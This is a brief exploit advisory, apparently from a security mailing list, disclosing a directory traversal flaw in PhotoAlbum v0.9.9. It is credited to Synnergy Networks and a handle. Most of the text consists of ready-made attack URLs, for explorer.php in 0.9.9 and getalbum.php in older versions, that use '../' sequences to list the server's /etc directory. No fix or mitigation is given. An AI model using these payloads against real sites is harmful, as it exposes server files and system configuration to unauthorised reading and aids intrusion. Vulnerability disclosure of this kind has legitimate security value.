Exploit:
  Affected program: PhotoAlbum v 0.9.9
  Any user is able to pass a directory as  request
  to the script, the script will read the directory
  and output all files included in it and has read
  access. for instance:

http://www.phpphotoalbum.com/products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/

Synnergy Networks
==============================
http://www.synnergy.net




For older versions than 0.9.9...
http://www.siteaffected.com/phpPhotoAlbum/getalbum.php?album=../../../etc/
will show /etc directory.

--------------------------------------------------------
ThE MaDj0kEr (KPK)
--------------------------------------------------------
mad@j0ker.net           | http://www.j0ker.net
--------------------------------------------------------